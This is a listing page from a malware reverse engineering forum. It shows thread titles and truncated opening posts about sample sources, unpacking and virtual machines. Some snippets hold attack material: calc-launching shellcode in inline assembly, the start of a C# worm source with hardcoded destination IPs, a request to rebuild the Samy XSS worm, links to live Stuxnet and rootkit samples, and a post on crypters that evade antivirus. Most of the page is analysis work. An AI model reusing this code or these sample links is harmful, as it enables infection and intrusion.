Malware Reverse Engineering
Debugging, disassembling and documenting interesting malware...
360 topics in this forum
-
Live Malware Samples...
by Teddy Rogers- 1 follower
- 18 replies
- 26k views
Thought I would start a topic with a list of places to find malware samples. Feel free to post other sources if you have any... and remember live samples will be harmful to your computer so if you don't know what your doing and/or how to work with malware don't read any further for the sake of your own sanity... Malware Domain List : http://www.malwaredomainlist.com/mdl.php Malware Blacklist : http://www.malwareblacklist.com/showMDL.php Ted.
-
this is what a could find and rar up 2 tmp files 1 exe that is really a dll 1 lnk file 1 lnk file (suckme) 1 sys file 1 dll file (suckme) vidnux.com offensivecomputing 4shared it may still yet be incomplete.. so if it is.. lemme know.. there are 2 sys files yet i could only find 1... sites are listed that i found parts of this worm at... rar passwd: infected StuxNet.rar
-
Which Virtual Machine Software do you prefer? 1 2 3
by deepzero- 1 follower
- 61 replies
- 34.3k views
Hi, I have been using Microsoft VirtualPC for years now. Which Virtualization Software do you prefer?
-
90$ XSS Worm Project
by tibe87- 4 replies
- 30.8k views
Introduction This is a school project (educational purpose), so I don't care about hacking any website. Its a bit over my head so thats why I am posting this project.Basically I need to reproduce the ''Samy worm'' known also as "myspace worm" in a controlled environment. Requierements For starters I need a "mini" myspace/facebook to test the worm. To make it simpler , there are some free social networks available like Ellg, Oxwall that you can use. (I have an old version of Oxwall already vulnerable to basic XSS) Or you can make it vulnerable yourself by editing it. (I know for sure that this is possible) Or maybe its easier for you to build it from scratch implementin…
-
EMV Softwares
by Xyl2k- 4 followers
- 11 replies
- 27k views
Someone on telegram intrigued me by telling me about software to read credit card chips, so here are some files that I got from the net. The first software in question, on which I came across: "EMVStudio" belonging to emvstudio.com If I look for the files on VT, it communicates with auth.emvstudio.com, I come across these 3 archives: EMVStudio.rar - 1ba1fac55003d2c966f0071b2c126169254b35a38b4e2b913557c4fb0faadfdb Contains 8d6dacff8a098b8d02202e8c6a4a65bbe20b332ba58d6165cca6f958187864c4 also a file named 'gp' who seem a config file. emvstudio_v1.1.1.rar - 0bd11f024845c07e0df8fe2f080f4925dc44a289e4e59b079be0a68ed2fc42a6 Contains emvstudio_v1.1.2.exe - ce9187aa…
-
Shellcode+SYSENTER = CALC (SP3) 1 2 3
by JMC31337- 58 replies
- 23.6k views
#include <windows.h> //DEV-C++ //link with -masm=intel asm(".intel_syntax noprefix"); static long csx; static char* test; int main(void) { asm("pop ebp"); asm("pop ebp"); asm("pop ebp"); //asm("push 0x11111111"); //asm("push 0xEEEEEEEE"); //asm("push 0xAAAAAAAA"); //asm("push 0xCCCCCCCC"); //char *test = "\x31\xC9\x51\x68" //"\x63\x61\x6C\x63" //"\x54\xB8\xC7\x93" //"\xC2\x77\xFF\xD0"; asm("push 0xD0FF77C2"); asm("push 0x93C7B854"); asm("push 0x636C6163"); asm("push 0x6851C931"); asm("push 0x004012E6"); asm("mov ebp,0x33333333"); asm("mov edx, esp"); asm("SYSENTER"); asm("push 0"); asm("call _ExitProcess@4"); asm("call esp"); return 0; …
-
www.support.me
by Teddy Rogers- 6 replies
- 23.3k views
Today I got a cold call from a woman claiming my computer had been playing up because I had accessed a webpage with a virus or opened SPAM with malware. Normally I put the phone down on cold calls but at the mention of a computer security issue I had to play along for a laugh to see what was up. This type of computer scam (cold call malware) is new to me. She asked me to go to Event Viewer and check the Application error logs and unsurprisingly there were a lot of errors and warnings. This is of course to legitimise the reason for the call and to justify what was to happen next. She asked me to go to www.support.me which then redirected me to https://secure.logmeinrescue.…
-
(Help Request) .Net Protector Identification 1 2
by madskillz- 25 replies
- 21.3k views
Hi I tried die , peid , protecton id , rdg , but cannot detect protector. de4dot detected as deepsea , but deobfuscation ws not done. File attached FoxUserTools.zip File can be malware , etc , please use VM , protection. Need packer identification and unpack help. Regards
-
- 10 replies
- 19.1k views
Hello, i've a question. Ive a DLL (yes, i know the source) which is confused using ConfuserEx 0.5 with .NET Framework 4.52. Now i've tried to to open the DLL using several disassembler but no result. I found several tutorials how to unconfuse the DLL in this forum but all of them are not successfully in this case. Ive tried ConfuserExFixer, MethodsDecrypter, ... and so on. could anyone tell me HOW it's possible and a decrypted result? Attached is the DLL. Its nothing special. Thanks. CGBfunctions.zip
-
TDL x64 Rootkit
by Aguila- 2 replies
- 16.4k views
Called TDL, TDSS, Alureon or Olmarik. First widely spreaded x64 rootkit. Analysis: />http://www.prevx.com/blog/154/TDL-rootkit-x-goes-in-the-wild.html />http://www.prevx.com/blog/155/x-TDL-rootkit--follow-up.html />http://www.symantec.com/connect/de/blogs/tidserv-64-bit-goes-hiding />http://blog.raidrush.ws/2010/09/11/malware-analyse-tdl-rootkit-64-bit-infektion/ (german, but with TDL dropper source code) download: http://www.xup.in/dl,15799673/TDL_x64.rar/ password: infected
-
- 8 replies
- 16.2k views
get the whole exploit code here: http://www.milw0rm.com/exploits/6031 i think this exploit is dangerous. maybe some software will use it to avoid debugging? or probably malware will use it. keep your eyes open
-
Reversing worm
by ~karthikeyanck~- 2 replies
- 16k views
Hi All I'm not sure if these kind-a requests are welcome'd. Am trying to reverse a worm and having troubles in doing it. I found that the worm is packed using autoit. Please can somebody assist me in reversing it. Let me know if you need the source. I understood the behavior of the worm, but trying to dig deep into the code to understand things better. Thanks for your assistance in advance, Note: I've already tried using autoit decompiler with no luck. It doesn't identify the executable
-
What is basethreadinitthunk?
by r42fr- 1 reply
- 15.7k views
What is basethreadinitthunk?I dont find it on msdn.
-
Malware VMProtect
by ONDragon- 5 replies
- 14.9k views
When I reverse the MALWARE , I realise it was PROTECTED by VM , so I try to run it so that catch its behavior .BUT there are some anti'VMware (I try to run it both in VMWare and VirtualBox) ways. The Questions: If I encounter the MALWARE , what shound I do? PS: How to Unpack the VM and how to hide the VMWare of both VMWare and VirtualBox!!! Please help ME . THANKS!!!
-
C# Nemesis.Worm
by JMC31337- 1 reply
- 14.8k views
//JMC31337 //NEMESIS WORM PROJEKT using System; using System.Net; using System.Net.Sockets; using System.Text; using System.Threading; using System.Collections.Generic; using System.IO; using System.Text.RegularExpressions; using System.Net.Mail; using System.Net.Mime; using System.Runtime.InteropServices; using System.Diagnostics; using System.Collections; using System.ComponentModel; using System.Data; using Microsoft.Win32; namespace ConsoleApplication1 { class Program { public static int bypass = 0; private static string DESTINATION_IP_ADDRESS = "204.13.204.222"; private static string DESTINATION_IP_ADDRESS2 = "2…
-
Chinese Spy App
by JMC31337- 0 replies
- 14.5k views
MobileHunter base.apk
-
fake crack sites
by Xyl2k- 2 followers
- 10 replies
- 14.5k views
So you want to download some releases from snd? alright let's see at snd.webscene.ir, the distribution section menu contain a link pointing at hxtps://keygens.pro/ Super, looks like there a lot of cracks over here! and the site is virus free, right? So let's pick something, i don't know, maybe 7-Data.Card.Recovery.1.1.keygen-SND hxtps://keygens.pro/crack/729775/ lol @ description on the page, didn't know reagan was from snd and born in russia Anyway we got redirected on a download page after clicking 'Download only Keygen' button, we have to fill a captcha and agree to the conditions The archive is password protected and contain only…
-
Collection of Anti-Malware Analysis Tricks.
by Noteworthy- 4 replies
- 14.4k views
Hi SnD, This is a small tool I wrote while reversing some malwares. It performs a bunch of nowadays malwares tricks and the goal is to see if you stay under the radar. That could be useful if: You are making an anti-debug plugin and you want to check its effectiveness. You want to ensure that your sandbox solution is hidden enough.. You want to write behavior rules to detect any attempt to use these tricks. Please, if you encounter any of the anti-analysis tricks which you have seen in a malware, don't hesitate to contribute. List of features supported: Anti-debugging attacks IsDebuggerPresent CheckRemoteDebuggerPresent …
-
Unpacking RunPe Malware
by Phasip- 11 replies
- 13.6k views
Hello! I recently started doing some malware reversing and the second application I meet is an app called ohhai.exe As all packer identifiers I have run says that it is Visual Basic I tried to open it with a program that views PCode, looking trough the code i found a function called RunPe, I found out this is a common way to hide viruses within vb code. The problem is that there does not seem to be much information on how to unpack these, I found two />http://www.opensc.ws/tutorials-articles/11144-tutorial-unpacking-runpe.html />http://interestingmalware.blogspot.com/2010/07/unpacking-vbinjectvbcryptrunpe.html which both have easy steps but I don't seem to be able t…
-
write a sandbox
by rever_ser- 2 replies
- 13.4k views
hi I want to write a sandbox. I want to know exactly what parts made up a sandbox and how to work any how. Can anyone recommend a resource in this regard?
-
Tracking Gimmiv...
by Teddy Rogers- 0 replies
- 12.7k views
Research_Blog___Research___SecureWorks.pdf http://www.secureworks.com/research/blog/i...racking-gimmiv/ Ted.
-
Memory Sniffing
by JMC31337- 4 replies
- 12.3k views
working on doing a lil phishing expedition (yea its for the birds but i gotta write a good one in C# before i move on) Grabbed CheatEngine to scan through some memory (cheat engine is not bad, but i dont like the crap it tries to install with it - GOT A BETTER ONE LEMME KNOW-) using Chrome to login in to GMAIL I put a fake password as 16 A's: GALX=p_COcLCigQk&continue=https%3A%2F%2Fmail.google.com%2Fmail%2F&service=mail&rm=false<mpl=default&hl=en&scc=1&ss=1&_utf8=%E2%98%83&bgresponse=%21A0I0ITH9HDNvS0R6sejAokAPWwIAAADsUgAAAA0qAQ54RhVt-Qu2LVKb4J23WkCZueD1ffB8V_ZSE_jIE04XOzOSUwm16rZ2suDsEJH9riKKR60AWqjQpirqHTN-qJ64hB7Rl61SZaj_8K…
-
W32.SafeSys.Worm
by Jaymz- 1 reply
- 12.3k views
Used search on the entire forum and also this sub-section,but I didn't find anything related to SafeSys virus... Here's a download link for it,if you want to examine it.. Notice that ALL THE FILES IN THE PACKAGE ARE INFECTED! The package is password protected,so it does not do any harm to your computer... Quote: "The worm is called W32.SafeSys.Worm and attacks a particular program called Deep Freeze. Deepfreeze is a computer protection utility that prevents malicious code from writing to the hard drive itself. Any malicious code is written to a memory buffer which then gets erased upon reboot. The original hard drive data is untouched and can simply be reloaded duri…
-
Unknown Packer
by payam5959- 1 follower
- 4 replies
- 12k views
I am trying to unpack 2 dll files which i'm not sure what they do. they seem to memory patch on some files. with Die it is detected as VMProtect, but when i browse them with CFFExplorer, and looking at different sections, I'm only seeing TORO0 and TORO1 with no vmp sections. I am not sure if it is VMP and so I have no clue how to unpack. can someone provide me some information on which kind of packer i am confronting with? also I can provide sample dll if someone can help. regards payam
-
Crypter overview
by cipher- 6 replies
- 11.9k views
hello i am here today with the executable that can obfuscate the virus and makes it fully undetectable from anti-viruses.This executable uses runPE techniques to inject into other process and to dump the crypted code into memory and hence the executable's code remain undetected by Anti-viruses. These crypters are programmed by individuals and hence remains undetected most of the time .Mostly they are coded in VB or .Net and hence you will find most of the viruses showing vb attributes during PE Scans ,but mostly the viruses/RATs/Stealers/Bots/Worms are coded in borland Delphi. Examples : 1) RATS : cybergate,Blackshades,pixel,spynet,darkcomet etc 2) STEALERS …